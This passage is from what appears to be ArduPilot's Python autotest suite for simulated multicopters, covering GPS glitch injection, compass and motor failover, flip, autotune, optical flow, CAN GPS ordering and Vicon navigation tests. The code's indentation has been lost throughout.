0.0006958,
0.0009431,
0.0009991,
0.0009444,
0.0007716,
0.0006221]
glitch_lon = [0.0000717,
0.0000912,
0.0002761,
0.0002626,
0.0002807,
0.0002049,
0.0001304]
glitch_num = len(glitch_lat)
self.progress("GPS Glitches:")
for i in range(1, glitch_num):
self.progress("glitch %d %.7f %.7f" %
(i, glitch_lat[i], glitch_lon[i]))
# Fly mission #1
self.progress("# Load copter_glitch_mission")
# load the waypoint count
num_wp = self.load_mission("copter_glitch_mission.txt", strict=False)
if not num_wp:
raise NotAchievedException("load copter_glitch_mission failed")
# turn on simulator display of gps and actual position
if self.use_map:
self.show_gps_and_sim_positions(True)
self.progress("test: Fly a mission from 1 to %u" % num_wp)
self.set_current_waypoint(1)
self.change_mode("STABILIZE")
self.wait_ready_to_arm()
self.zero_throttle()
self.arm_vehicle()
# switch into AUTO mode and raise throttle
self.change_mode('AUTO')
self.set_rc(3, 1500)
# wait until 100m from home
try:
self.wait_distance(100, 5, 90)
except Exception as e:
if self.use_map:
self.show_gps_and_sim_positions(False)
raise e
# record time and position
tstart = self.get_sim_time()
# initialise current glitch
glitch_current = 0
self.progress("Apply first glitch")
self.set_parameter("SIM_GPS_GLITCH_X", glitch_lat[glitch_current])
self.set_parameter("SIM_GPS_GLITCH_Y", glitch_lon[glitch_current])
# record position for 30 seconds
while glitch_current < glitch_num:
tnow = self.get_sim_time()
desired_glitch_num = int((tnow - tstart) * 2.2)
if desired_glitch_num > glitch_current and glitch_current != -1:
glitch_current = desired_glitch_num
# apply next glitch
if glitch_current < glitch_num:
self.progress("Applying glitch %u" % glitch_current)
self.set_parameter("SIM_GPS_GLITCH_X",
glitch_lat[glitch_current])
self.set_parameter("SIM_GPS_GLITCH_Y",
glitch_lon[glitch_current])
# turn off glitching
self.progress("Completed Glitches")
self.set_parameter("SIM_GPS_GLITCH_X", 0)
self.set_parameter("SIM_GPS_GLITCH_Y", 0)
# continue with the mission
self.wait_waypoint(0, num_wp-1, timeout=500)
# wait for arrival back home
self.wait_distance_to_home(0, 10, timeout=timeout)
# turn off simulator display of gps and actual position
if self.use_map:
self.show_gps_and_sim_positions(False)
self.progress("GPS Glitch test Auto completed: passed!")
self.wait_disarmed()
# re-arming is problematic because the GPS is glitching!
self.reboot_sitl()
# fly_simple - assumes the simple bearing is initialised to be
# directly north flies a box with 100m west, 15 seconds north,
# 50 seconds east, 15 seconds south
def fly_simple(self, side=50):
self.takeoff(10, mode="LOITER")
# set SIMPLE mode for all flight modes
self.set_parameter("SIMPLE", 63)
# switch to stabilize mode
self.change_mode('STABILIZE')
self.set_rc(3, 1545)
# fly south 50m
self.progress("# Flying south %u meters" % side)
self.set_rc(1, 1300)
self.wait_distance(side, 5, 60)
self.set_rc(1, 1500)
# fly west 8 seconds
self.progress("# Flying west for 8 seconds")
self.set_rc(2, 1300)
tstart = self.get_sim_time()
while self.get_sim_time_cached() < (tstart + 8):
self.mav.recv_match(type='VFR_HUD', blocking=True)
self.set_rc(2, 1500)
# fly north 25 meters
self.progress("# Flying north %u meters" % (side/2.0))
self.set_rc(1, 1700)
self.wait_distance(side/2, 5, 60)
self.set_rc(1, 1500)
# fly east 8 seconds
self.progress("# Flying east for 8 seconds")
self.set_rc(2, 1700)
tstart = self.get_sim_time()
while self.get_sim_time_cached() < (tstart + 8):
self.mav.recv_match(type='VFR_HUD', blocking=True)
self.set_rc(2, 1500)
# hover in place
self.hover()
self.do_RTL(timeout=500)
# fly_super_simple - flies a circle around home for 45 seconds
def fly_super_simple(self, timeout=45):
self.takeoff(10, mode="LOITER")
# fly forward 20m
self.progress("# Flying forward 20 meters")
self.set_rc(2, 1300)
self.wait_distance(20, 5, 60)
self.set_rc(2, 1500)
# set SUPER SIMPLE mode for all flight modes
self.set_parameter("SUPER_SIMPLE", 63)
# switch to stabilize mode
self.change_mode("ALT_HOLD")
self.set_rc(3, 1500)
# start copter yawing slowly
self.set_rc(4, 1550)
# roll left for timeout seconds
self.progress("# rolling left from pilot's POV for %u seconds"
% timeout)
self.set_rc(1, 1300)
tstart = self.get_sim_time()
while self.get_sim_time_cached() < (tstart + timeout):
self.mav.recv_match(type='VFR_HUD', blocking=True)
# stop rolling and yawing
self.set_rc(1, 1500)
self.set_rc(4, 1500)
# restore simple mode parameters to default
self.set_parameter("SUPER_SIMPLE", 0)
# hover in place
self.hover()
self.do_RTL()
# fly_circle - flies a circle with 20m radius
def fly_circle(self, holdtime=36):
# the following should not be required. But there appears to
# be a physics failure in the simulation which is causing CI
# to fall over a lot. -pb 202007021209
self.reboot_sitl()
self.takeoff(10, mode="LOITER")
# face west
self.progress("turn west")
self.set_rc(4, 1580)
self.wait_heading(270)
self.set_rc(4, 1500)
# set CIRCLE radius
self.set_parameter("CIRCLE_RADIUS", 3000)
# fly forward (east) at least 100m
self.set_rc(2, 1100)
self.wait_distance(100)
# return pitch stick back to middle
self.set_rc(2, 1500)
# set CIRCLE mode
self.change_mode('CIRCLE')
# wait
m = self.mav.recv_match(type='VFR_HUD', blocking=True)
start_altitude = m.alt
tstart = self.get_sim_time()
self.progress("Circle at %u meters for %u seconds" %
(start_altitude, holdtime))
while self.get_sim_time_cached() < tstart + holdtime:
m = self.mav.recv_match(type='VFR_HUD', blocking=True)
self.progress("heading %d" % m.heading)
self.progress("CIRCLE OK for %u seconds" % holdtime)
self.do_RTL()
# test_mag_fail - test failover of compass in EKF
def test_mag_fail(self):
# we want both EK2 and EK3
self.set_parameter("EK2_ENABLE", 1)
self.set_parameter("EK3_ENABLE", 1)
self.takeoff(10, mode="LOITER")
self.change_mode('CIRCLE')
self.delay_sim_time(20)
self.context_collect("STATUSTEXT")
self.progress("Failing first compass")
self.set_parameter("SIM_MAG1_FAIL", 1)
# we want for the message twice, one for EK2 and again for EK3
self.wait_statustext("EKF2 IMU0 switching to compass 1", check_context=True)
self.wait_statustext("EKF3 IMU0 switching to compass 1", check_context=True)
self.progress("compass switch 1 OK")
self.delay_sim_time(2)
self.context_clear_collection("STATUSTEXT")
self.progress("Failing 2nd compass")
self.set_parameter("SIM_MAG2_FAIL", 1)
self.wait_statustext("EKF2 IMU0 switching to compass 2", check_context=True)
self.wait_statustext("EKF3 IMU0 switching to compass 2", check_context=True)
self.progress("compass switch 2 OK")
self.delay_sim_time(2)
self.context_clear_collection("STATUSTEXT")
self.progress("Failing 3rd compass")
self.set_parameter("SIM_MAG3_FAIL", 1)
self.delay_sim_time(2)
self.set_parameter("SIM_MAG1_FAIL", 0)
self.wait_statustext("EKF2 IMU0 switching to compass 0", check_context=True)
self.wait_statustext("EKF3 IMU0 switching to compass 0", check_context=True)
self.progress("compass switch 0 OK")
self.do_RTL()
def wait_attitude(self, desroll=None, despitch=None, timeout=2, tolerance=10):
'''wait for an attitude (degrees)'''
if desroll is None and despitch is None:
raise ValueError("despitch or desroll must be supplied")
tstart = self.get_sim_time()
while True:
if self.get_sim_time_cached() - tstart > 2:
raise AutoTestTimeoutException("Failed to achieve attitude")
m = self.mav.recv_match(type='ATTITUDE', blocking=True)
roll_deg = math.degrees(m.roll)
pitch_deg = math.degrees(m.pitch)
self.progress("wait_att: roll=%f desroll=%s pitch=%f despitch=%s" %
(roll_deg, desroll, pitch_deg, despitch))
if desroll is not None and abs(roll_deg - desroll) > tolerance:
continue
if despitch is not None and abs(pitch_deg - despitch) > tolerance:
continue
return
def fly_flip(self):
ex = None
try:
self.set_message_rate_hz(mavutil.mavlink.MAVLINK_MSG_ID_ATTITUDE, 100)
self.takeoff(20)
self.hover()
old_speedup = self.get_parameter("SIM_SPEEDUP")
self.set_parameter('SIM_SPEEDUP', 1)
self.progress("Flipping in roll")
self.set_rc(1, 1700)
self.send_cmd_do_set_mode('FLIP') # don't wait for success
self.wait_attitude(despitch=0, desroll=45, tolerance=30)
self.wait_attitude(despitch=0, desroll=90, tolerance=30)
self.wait_attitude(despitch=0, desroll=-45, tolerance=30)
self.progress("Waiting for level")
self.set_rc(1, 1500) # can't change quickly enough!
self.wait_attitude(despitch=0, desroll=0, tolerance=5)
self.progress("Regaining altitude")
self.change_mode('ALT_HOLD')
self.wait_for_alt(20, max_err=40)
self.progress("Flipping in pitch")
self.set_rc(2, 1700)
self.send_cmd_do_set_mode('FLIP') # don't wait for success
self.wait_attitude(despitch=45, desroll=0, tolerance=30)
# can't check roll here as it flips from 0 to -180..
self.wait_attitude(despitch=90, tolerance=30)
self.wait_attitude(despitch=-45, tolerance=30)
self.progress("Waiting for level")
self.set_rc(2, 1500) # can't change quickly enough!
self.wait_attitude(despitch=0, desroll=0, tolerance=5)
self.set_parameter('SIM_SPEEDUP', old_speedup)
self.do_RTL()
except Exception as e:
self.print_exception_caught(e)
ex = e
self.set_message_rate_hz(mavutil.mavlink.MAVLINK_MSG_ID_ATTITUDE, 0)
if ex is not None:
raise ex
# fly_optical_flow_limits - test EKF navigation limiting
def fly_optical_flow_limits(self):
ex = None
self.context_push()
try:
self.set_parameter("SIM_FLOW_ENABLE", 1)
self.set_parameter("FLOW_TYPE", 10)
# configure EKF to use optical flow instead of GPS
ahrs_ekf_type = self.get_parameter("AHRS_EKF_TYPE")
if ahrs_ekf_type == 2:
self.set_parameter("EK2_GPS_TYPE", 3)
if ahrs_ekf_type == 3:
self.set_parameter("EK3_SRC1_POSXY", 0)
self.set_parameter("EK3_SRC1_VELXY", 5)
self.set_parameter("EK3_SRC1_VELZ", 0)
self.set_analog_rangefinder_parameters()
self.set_parameter("SIM_GPS_DISABLE", 1)
self.set_parameter("SIM_TERRAIN", 0)
self.reboot_sitl()
# we can't takeoff in loiter as we need flow healthy
self.takeoff(alt_min=5, mode='ALT_HOLD', require_absolute=False, takeoff_throttle=1800)
self.change_mode('LOITER')
# speed should be limited to <10m/s
self.set_rc(2, 1000)
tstart = self.get_sim_time()
timeout = 60
started_climb = False
while self.get_sim_time_cached() - tstart < timeout:
m = self.mav.recv_match(type='GLOBAL_POSITION_INT', blocking=True)
spd = math.sqrt(m.vx**2 + m.vy**2) * 0.01
alt = m.relative_alt*0.001
# calculate max speed from altitude above the ground
margin = 2.0
max_speed = alt * 1.5 + margin
self.progress("%0.1f: Low Speed: %f (want <= %u) alt=%.1f" %
(self.get_sim_time_cached() - tstart,
spd,
max_speed, alt))
if spd > max_speed:
raise NotAchievedException(("Speed should be limited by"
"EKF optical flow limits"))
# after 30 seconds start climbing
if not started_climb and self.get_sim_time_cached() - tstart > 30:
started_climb = True
self.set_rc(3, 1900)
self.progress("Moving higher")
# check altitude is not climbing above 35m
if alt > 35:
raise NotAchievedException("Alt should be limited by EKF optical flow limits")
except Exception as e:
self.print_exception_caught(e)
ex = e
self.set_rc(2, 1500)
self.context_pop()
self.disarm_vehicle(force=True)
self.reboot_sitl()
if ex is not None:
raise ex
def fly_autotune(self):
"""Test autotune mode"""
rlld = self.get_parameter("ATC_RAT_RLL_D")
rlli = self.get_parameter("ATC_RAT_RLL_I")
rllp = self.get_parameter("ATC_RAT_RLL_P")
self.takeoff(10)
# hold position in loiter
self.change_mode('AUTOTUNE')
tstart = self.get_sim_time()
sim_time_expected = 5000
deadline = tstart + sim_time_expected
while self.get_sim_time_cached() < deadline:
now = self.get_sim_time_cached()
m = self.mav.recv_match(type='STATUSTEXT',
blocking=True,
timeout=1)
if m is None:
continue
self.progress("STATUSTEXT (%u<%u): %s" % (now, deadline, m.text))
if "AutoTune: Success" in m.text:
self.progress("AUTOTUNE OK (%u seconds)" % (now - tstart))
# near enough for now:
self.change_mode('LAND')
self.wait_landed_and_disarmed()
# check the original gains have been re-instated
if (rlld != self.get_parameter("ATC_RAT_RLL_D") or
rlli != self.get_parameter("ATC_RAT_RLL_I") or
rllp != self.get_parameter("ATC_RAT_RLL_P")):
raise NotAchievedException("AUTOTUNE gains still present")
return
raise NotAchievedException("AUTOTUNE failed (%u seconds)" %
(self.get_sim_time() - tstart))
def fly_autotune_switch(self):
"""Test autotune on a switch with gains being saved"""
# autotune changes a set of parameters on the vehicle which
# are not in our context. That changes the flight
# characterstics, which we can't afford between runs. So
# completely reset the simulated vehicle after the run is
# complete by "customising" the commandline here:
self.customise_SITL_commandline([])
self.context_push()
ex = None
try:
self.fly_autotune_switch_body()
except Exception as e:
self.print_exception_caught(e)
ex = e
self.context_pop()
if ex is not None:
raise ex
def fly_autotune_switch_body(self):
self.set_parameter("RC8_OPTION", 17)
self.set_parameter("ATC_RAT_RLL_FLTT", 20)
rlld = self.get_parameter("ATC_RAT_RLL_D")
rlli = self.get_parameter("ATC_RAT_RLL_I")
rllp = self.get_parameter("ATC_RAT_RLL_P")
rllt = self.get_parameter("ATC_RAT_RLL_FLTT")
self.progress("AUTOTUNE pre-gains are P:%f I:%f D:%f" %
(self.get_parameter("ATC_RAT_RLL_P"),
self.get_parameter("ATC_RAT_RLL_I"),
self.get_parameter("ATC_RAT_RLL_D")))
self.takeoff(10, mode='LOITER')
# hold position in loiter and run autotune
self.set_rc(8, 1850)
self.wait_mode('AUTOTUNE')
tstart = self.get_sim_time()
sim_time_expected = 5000
deadline = tstart + sim_time_expected
while self.get_sim_time_cached() < deadline:
now = self.get_sim_time_cached()
m = self.mav.recv_match(type='STATUSTEXT',
blocking=True,
timeout=1)
if m is None:
continue
self.progress("STATUSTEXT (%u<%u): %s" % (now, deadline, m.text))
if "AutoTune: Success" in m.text:
self.progress("AUTOTUNE OK (%u seconds)" % (now - tstart))
# Check original gains are re-instated
self.set_rc(8, 1100)
self.delay_sim_time(1)
self.progress("AUTOTUNE original gains are P:%f I:%f D:%f" %
(self.get_parameter("ATC_RAT_RLL_P"), self.get_parameter("ATC_RAT_RLL_I"),
self.get_parameter("ATC_RAT_RLL_D")))
if (rlld != self.get_parameter("ATC_RAT_RLL_D") or
rlli != self.get_parameter("ATC_RAT_RLL_I") or
rllp != self.get_parameter("ATC_RAT_RLL_P")):
raise NotAchievedException("AUTOTUNE gains still present")
# Use autotuned gains
self.set_rc(8, 1850)
self.delay_sim_time(1)
self.progress("AUTOTUNE testing gains are P:%f I:%f D:%f" %
(self.get_parameter("ATC_RAT_RLL_P"), self.get_parameter("ATC_RAT_RLL_I"),
self.get_parameter("ATC_RAT_RLL_D")))
if (rlld == self.get_parameter("ATC_RAT_RLL_D") or
rlli == self.get_parameter("ATC_RAT_RLL_I") or
rllp == self.get_parameter("ATC_RAT_RLL_P")):
raise NotAchievedException("AUTOTUNE gains not present in pilot testing")
# land without changing mode
self.set_rc(3, 1000)
self.wait_for_alt(0)
self.wait_disarmed()
# Check gains are still there after disarm
if (rlld == self.get_parameter("ATC_RAT_RLL_D") or
rlli == self.get_parameter("ATC_RAT_RLL_I") or
rllp == self.get_parameter("ATC_RAT_RLL_P")):
raise NotAchievedException("AUTOTUNE gains not present on disarm")
self.reboot_sitl()
# Check gains are still there after reboot
if (rlld == self.get_parameter("ATC_RAT_RLL_D") or
rlli == self.get_parameter("ATC_RAT_RLL_I") or
rllp == self.get_parameter("ATC_RAT_RLL_P")):
raise NotAchievedException("AUTOTUNE gains not present on reboot")
# Check FLTT is unchanged
if rllt != self.get_parameter("ATC_RAT_RLL_FLTT"):
raise NotAchievedException("AUTOTUNE FLTT was modified")
return
raise NotAchievedException("AUTOTUNE failed (%u seconds)" %
(self.get_sim_time() - tstart))
# fly_auto_test - fly mission which tests a significant number of commands
def fly_auto_test(self):
# Fly mission #1
self.progress("# Load copter_mission")
# load the waypoint count
num_wp = self.load_mission("copter_mission.txt", strict=False)
if not num_wp:
raise NotAchievedException("load copter_mission failed")
self.progress("test: Fly a mission from 1 to %u" % num_wp)
self.set_current_waypoint(1)
self.change_mode("LOITER")
self.wait_ready_to_arm()
self.arm_vehicle()
# switch into AUTO mode and raise throttle
self.change_mode("AUTO")
self.set_rc(3, 1500)
# fly the mission
self.wait_waypoint(0, num_wp-1, timeout=500)
# set throttle to minimum
self.zero_throttle()
# wait for disarm
self.wait_disarmed()
self.progress("MOTORS DISARMED OK")
self.progress("Auto mission completed: passed!")
# fly_auto_test using CAN GPS - fly mission which tests normal operation alongside CAN GPS
def fly_auto_test_using_can_gps(self):
self.set_parameter("CAN_P1_DRIVER", 1)
self.set_parameter("GPS_TYPE", 9)
self.set_parameter("GPS_TYPE2", 9)
self.set_parameter("SIM_GPS2_DISABLE", 0)
self.context_push()
self.set_parameter("ARMING_CHECK", 1 << 3)
self.context_collect('STATUSTEXT')
self.reboot_sitl()
# Test UAVCAN GPS ordering working
gps1_det_text = self.wait_text("GPS 1: specified as UAVCAN.*", regex=True, check_context=True)
gps2_det_text = self.wait_text("GPS 2: specified as UAVCAN.*", regex=True, check_context=True)
gps1_nodeid = int(gps1_det_text.split('-')[1])
gps2_nodeid = int(gps2_det_text.split('-')[1])
if gps1_nodeid is None or gps2_nodeid is None:
raise NotAchievedException("GPS not ordered per the order of Node IDs")
self.context_stop_collecting('STATUSTEXT')
GPS_Order_Tests = [[gps2_nodeid, gps2_nodeid, gps2_nodeid, 0,
"PreArm: Same Node Id {} set for multiple GPS".format(gps2_nodeid)],
[gps1_nodeid, int(gps2_nodeid/2), gps1_nodeid, 0,
"Selected GPS Node {} not set as instance {}".format(int(gps2_nodeid/2), 2)],
[int(gps1_nodeid/2), gps2_nodeid, 0, gps2_nodeid,
"Selected GPS Node {} not set as instance {}".format(int(gps1_nodeid/2), 1)],
[gps1_nodeid, gps2_nodeid, gps1_nodeid, gps2_nodeid, ""],
[gps2_nodeid, gps1_nodeid, gps2_nodeid, gps1_nodeid, ""],
[gps1_nodeid, 0, gps1_nodeid, gps2_nodeid, ""],
[0, gps2_nodeid, gps1_nodeid, gps2_nodeid, ""]]
for case in GPS_Order_Tests:
self.progress("############################### Trying Case: " + str(case))
self.set_parameter("GPS1_CAN_OVRIDE", case[0])
self.set_parameter("GPS2_CAN_OVRIDE", case[1])
self.drain_mav()
self.context_collect('STATUSTEXT')
self.reboot_sitl()
gps1_det_text = None
gps2_det_text = None
try:
gps1_det_text = self.wait_text("GPS 1: specified as UAVCAN.*", regex=True, check_context=True)
except AutoTestTimeoutException:
pass
try:
gps2_det_text = self.wait_text("GPS 2: specified as UAVCAN.*", regex=True, check_context=True)
except AutoTestTimeoutException:
pass
self.context_stop_collecting('STATUSTEXT')
self.change_mode('LOITER')
if case[2] == 0 and case[3] == 0:
if gps1_det_text or gps2_det_text:
raise NotAchievedException("Failed ordering for requested CASE:", case)
if case[2] == 0 or case[3] == 0:
if bool(gps1_det_text is not None) == bool(gps2_det_text is not None):
print(gps1_det_text)
print(gps2_det_text)
raise NotAchievedException("Failed ordering for requested CASE:", case)
if gps1_det_text:
if case[2] != int(gps1_det_text.split('-')[1]):
raise NotAchievedException("Failed ordering for requested CASE:", case)
if gps2_det_text:
if case[3] != int(gps2_det_text.split('-')[1]):
raise NotAchievedException("Failed ordering for requested CASE:", case)
if len(case[4]):
self.context_collect('STATUSTEXT')
self.run_cmd(mavutil.mavlink.MAV_CMD_COMPONENT_ARM_DISARM,
1, # ARM
0,
0,
0,
0,
0,
0,
timeout=10,
want_result=mavutil.mavlink.MAV_RESULT_FAILED)
self.wait_statustext(case[4], check_context=True)
self.context_stop_collecting('STATUSTEXT')
self.progress("############################### All GPS Order Cases Tests Passed")
self.context_pop()
self.fly_auto_test()
def fly_motor_fail(self, fail_servo=0, fail_mul=0.0, holdtime=30):
"""Test flight with reduced motor efficiency"""
# we only expect an octocopter to survive ATM:
servo_counts = {
# 2: 6, # hexa
3: 8, # octa
# 5: 6, # Y6
}
frame_class = int(self.get_parameter("FRAME_CLASS"))
if frame_class not in servo_counts:
self.progress("Test not relevant for frame_class %u" % frame_class)
return
servo_count = servo_counts[frame_class]
if fail_servo < 0 or fail_servo > servo_count:
raise ValueError('fail_servo outside range for frame class')
self.takeoff(10, mode="LOITER")
self.change_alt(alt_min=50)
# Get initial values
start_hud = self.mav.recv_match(type='VFR_HUD', blocking=True)
start_attitude = self.mav.recv_match(type='ATTITUDE', blocking=True)
hover_time = 5
try:
tstart = self.get_sim_time()
int_error_alt = 0
int_error_yaw_rate = 0
int_error_yaw = 0
self.progress("Hovering for %u seconds" % hover_time)
failed = False
while True:
now = self.get_sim_time_cached()
if now - tstart > holdtime + hover_time:
break
servo = self.mav.recv_match(type='SERVO_OUTPUT_RAW',
blocking=True)
hud = self.mav.recv_match(type='VFR_HUD', blocking=True)
attitude = self.mav.recv_match(type='ATTITUDE', blocking=True)
if not failed and now - tstart > hover_time:
self.progress("Killing motor %u (%u%%)" %
(fail_servo+1, fail_mul))
self.set_parameter("SIM_ENGINE_FAIL", fail_servo)
self.set_parameter("SIM_ENGINE_MUL", fail_mul)
failed = True
if failed:
self.progress("Hold Time: %f/%f" % (now-tstart, holdtime))
servo_pwm = [servo.servo1_raw,
servo.servo2_raw,
servo.servo3_raw,
servo.servo4_raw,
servo.servo5_raw,
servo.servo6_raw,
servo.servo7_raw,
servo.servo8_raw]
self.progress("PWM output per motor")
for i, pwm in enumerate(servo_pwm[0:servo_count]):
if pwm > 1900:
state = "oversaturated"
elif pwm < 1200:
state = "undersaturated"
else:
state = "OK"
if failed and i == fail_servo:
state += " (failed)"
self.progress("servo %u [pwm=%u] [%s]" % (i+1, pwm, state))
alt_delta = hud.alt - start_hud.alt
yawrate_delta = attitude.yawspeed - start_attitude.yawspeed
yaw_delta = attitude.yaw - start_attitude.yaw
self.progress("Alt=%fm (delta=%fm)" % (hud.alt, alt_delta))
self.progress("Yaw rate=%f (delta=%f) (rad/s)" %
(attitude.yawspeed, yawrate_delta))
self.progress("Yaw=%f (delta=%f) (deg)" %
(attitude.yaw, yaw_delta))
dt = self.get_sim_time() - now
int_error_alt += abs(alt_delta/dt)
int_error_yaw_rate += abs(yawrate_delta/dt)
int_error_yaw += abs(yaw_delta/dt)
self.progress("## Error Integration ##")
self.progress(" Altitude: %fm" % int_error_alt)
self.progress(" Yaw rate: %f rad/s" % int_error_yaw_rate)
self.progress(" Yaw: %f deg" % int_error_yaw)
self.progress("----")
if int_error_yaw_rate > 0.1:
raise NotAchievedException("Vehicle is spinning")
if alt_delta < -20:
raise NotAchievedException("Vehicle is descending")
self.set_parameter("SIM_ENGINE_FAIL", 0)
self.set_parameter("SIM_ENGINE_MUL", 1.0)
except Exception as e:
self.set_parameter("SIM_ENGINE_FAIL", 0)
self.set_parameter("SIM_ENGINE_MUL", 1.0)
raise e
self.do_RTL()
def fly_motor_vibration(self):
"""Test flight with motor vibration"""
self.context_push()
ex = None
try:
self.set_rc_default()
# magic tridge EKF type that dramatically speeds up the test
self.set_parameters({
"AHRS_EKF_TYPE": 10,
"INS_LOG_BAT_MASK": 3,
"INS_LOG_BAT_OPT": 0,
"LOG_BITMASK": 958,
"LOG_DISARMED": 0,
"SIM_VIB_MOT_MAX": 350,
# these are real values taken from a 180mm Quad:
"SIM_GYR1_RND": 20,
"SIM_ACC1_RND": 5,
"SIM_ACC2_RND": 5,
"SIM_INS_THR_MIN": 0.1,
})
self.reboot_sitl()
self.takeoff(15, mode="ALT_HOLD")
hover_time = 15
tstart = self.get_sim_time()
self.progress("Hovering for %u seconds" % hover_time)
while self.get_sim_time_cached() < tstart + hover_time:
self.mav.recv_match(type='ATTITUDE', blocking=True)
tend = self.get_sim_time()
# if we don't reduce vibes here then the landing detector
# may not trigger
self.set_parameter("SIM_VIB_MOT_MAX", 0)
self.do_RTL()
psd = self.mavfft_fttd(1, 0, tstart * 1.0e6, tend * 1.0e6)
# ignore the first 20Hz and look for a peak at -15dB or more
ignore_bins = 20
freq = psd["F"][numpy.argmax(psd["X"][ignore_bins:]) + ignore_bins]
if numpy.amax(psd["X"][ignore_bins:]) < -15 or freq < 180 or freq > 300:
raise NotAchievedException(
"Did not detect a motor peak, found %f at %f dB" %
(freq, numpy.amax(psd["X"][ignore_bins:])))
else:
self.progress("Detected motor peak at %fHz" % freq)
# now add a notch and check that post-filter the peak is squashed below 40dB
self.set_parameters({
"INS_LOG_BAT_OPT": 2,
"INS_NOTCH_ENABLE": 1,
"INS_NOTCH_FREQ": freq,
"INS_NOTCH_ATT": 50,
"INS_NOTCH_BW": freq/2,
"SIM_VIB_MOT_MAX": 350,
})
self.reboot_sitl()
self.takeoff(15, mode="ALT_HOLD")
tstart = self.get_sim_time()
self.progress("Hovering for %u seconds" % hover_time)
while self.get_sim_time_cached() < tstart + hover_time:
self.mav.recv_match(type='ATTITUDE', blocking=True)
tend = self.get_sim_time()
self.set_parameter("SIM_VIB_MOT_MAX", 0)
self.do_RTL()
psd = self.mavfft_fttd(1, 0, tstart * 1.0e6, tend * 1.0e6)
freq = psd["F"][numpy.argmax(psd["X"][ignore_bins:]) + ignore_bins]
peakdB = numpy.amax(psd["X"][ignore_bins:])
if peakdB < -23:
self.progress("Did not detect a motor peak, found %f at %f dB" % (freq, peakdB))
else:
raise NotAchievedException("Detected peak %.1f Hz %.2f dB" % (freq, peakdB))
except Exception as e:
self.print_exception_caught(e)
ex = e
self.disarm_vehicle(force=True)
self.context_pop()
self.reboot_sitl()
if ex is not None:
raise ex
def fly_vision_position(self):
"""Disable GPS navigation, enable Vicon input."""
# scribble down a location we can set origin to:
self.customise_SITL_commandline(["--uartF=sim:vicon:"])
self.progress("Waiting for location")
self.change_mode('LOITER')
self.wait_ready_to_arm()
old_pos = self.mav.recv_match(type='GLOBAL_POSITION_INT', blocking=True)
print("old_pos=%s" % str(old_pos))
self.context_push()
ex = None
try:
# configure EKF to use external nav instead of GPS
ahrs_ekf_type = self.get_parameter("AHRS_EKF_TYPE")
if ahrs_ekf_type == 2:
self.set_parameter("EK2_GPS_TYPE", 3)
if ahrs_ekf_type == 3:
self.set_parameter("EK3_SRC1_POSXY", 6)
self.set_parameter("EK3_SRC1_VELXY", 6)
self.set_parameter("EK3_SRC1_POSZ", 6)
self.set_parameter("EK3_SRC1_VELZ", 6)
self.set_parameter("GPS_TYPE", 0)
self.set_parameter("VISO_TYPE", 1)
self.set_parameter("SERIAL5_PROTOCOL", 1)
self.reboot_sitl()
# without a GPS or some sort of external prompting, AP
# doesn't send system_time messages. So prompt it:
self.mav.mav.system_time_send(int(time.time() * 1000000), 0)
self.progress("Waiting for non-zero-lat")
tstart = self.get_sim_time()
while True:
self.mav.mav.set_gps_global_origin_send(1,
old_pos.lat,
old_pos.lon,
old_pos.alt)
gpi = self.mav.recv_match(type='GLOBAL_POSITION_INT',
blocking=True)
self.progress("gpi=%s" % str(gpi))
if gpi.lat != 0:
break
if self.get_sim_time_cached() - tstart > 60:
raise AutoTestTimeoutException("Did not get non-zero lat")
self.takeoff()
self.set_rc(1, 1600)
tstart = self.get_sim_time()
while True:
vicon_pos = self.mav.recv_match(type='VISION_POSITION_ESTIMATE',
blocking=True)
# print("vpe=%s" % str(vicon_pos))
self.mav.recv_match(type='GLOBAL_POSITION_INT',
blocking=True)
# self.progress("gpi=%s" % str(gpi))
if vicon_pos.x > 40:
break
if self.get_sim_time_cached() - tstart > 100:
raise AutoTestTimeoutException("Vicon showed no movement")
# recenter controls:
self.set_rc(1, 1500)
self.progress("# Enter RTL")
self.change_mode('RTL')
self.set_rc(3, 1500)
tstart = self.get_sim_time()
while True:
if self.get_sim_time_cached() - tstart > 200:
raise NotAchievedException("Did not disarm")
self.mav.recv_match(type='GLOBAL_POSITION_INT',
blocking=True)
# print("gpi=%s" % str(gpi))
self.mav.recv_match(type='SIMSTATE',
blocking=True)
# print("ss=%s" % str(ss))
# wait for RTL disarm:
if not self.armed():
break
except Exception as e:
self.print_exception_caught(e)
ex = e
self.context_pop()
self.zero_throttle()
self.reboot_sitl()
if ex is not None:
raise ex
def fly_gps_vicon_switching(self):
"""Fly GPS and Vicon switching test"""
self.customise_SITL_commandline(["--uartF=sim:vicon:"])
"""Setup parameters including switching to EKF3"""
self.context_push()
ex = None
try:
self.set_parameters({
"VISO_TYPE": 2, # enable vicon
"SERIAL5_PROTOCOL": 2,
"EK3_ENABLE": 1,
"EK3_SRC2_POSXY": 6, # External Nav
"EK3_SRC2_POSZ": 6, # External Nav
"EK3_SRC2_VELXY": 6, # External Nav
"EK3_SRC2_VELZ": 6, # External Nav
"EK3_SRC2_YAW": 6, # External Nav
"RC7_OPTION": 80, # RC aux switch 7 set to Viso Align
"RC8_OPTION": 90, # RC aux switch 8 set to EKF source selector
"EK2_ENABLE": 0,
"AHRS_EKF_TYPE": 3,
})
self.reboot_sitl()
# switch to use GPS
self.set_rc(8, 1000)
# ensure we can get a global position:
self.poll_home_position(timeout=120)
# record starting position
old_pos = self.get_global_position_int()
print("old_pos=%s" % str(old_pos))
# align vicon yaw with ahrs heading
self.set_rc(7, 2000)
# takeoff to 10m in Loiter
self.progress("Moving to ensure location is tracked")
self.takeoff(10, mode="LOITER", require_absolute=True, timeout=720)
# fly forward in Loiter
self.set_rc(2, 1300)
# disable vicon
self.set_parameter("SIM_VICON_FAIL", 1)
# ensure vehicle remain in Loiter for 15 seconds
tstart = self.get_sim_time()
while self.get_sim_time() - tstart < 15:
if not self.mode_is('LOITER'):
raise NotAchievedException("Expected to stay in loiter for >15 seconds")
# re-enable vicon
self.set_parameter("SIM_VICON_FAIL", 0)
# switch to vicon, disable GPS and wait 10sec to ensure vehicle remains in Loiter
self.set_rc(8, 1500)
self.set_parameter("GPS_TYPE", 0)
# ensure vehicle remain in Loiter for 15 seconds
tstart = self.get_sim_time()
while self.get_sim_time() - tstart < 15:
if not self.mode_is('LOITER'):
raise NotAchievedException("Expected to stay in loiter for >15 seconds")
# RTL and check vehicle arrives within 10m of home
self.set_rc(2, 1500)
self.do_RTL()
except Exception as e:
self.print_exception_caught(e)
ex = e
self.context_pop()
self.disarm_vehicle(force=True)
self.reboot_sitl()
if ex is not None:
raise ex
def fly_rtl_speed(self):
"""Test RTL Speed parameters"""
rtl_speed_ms = 7
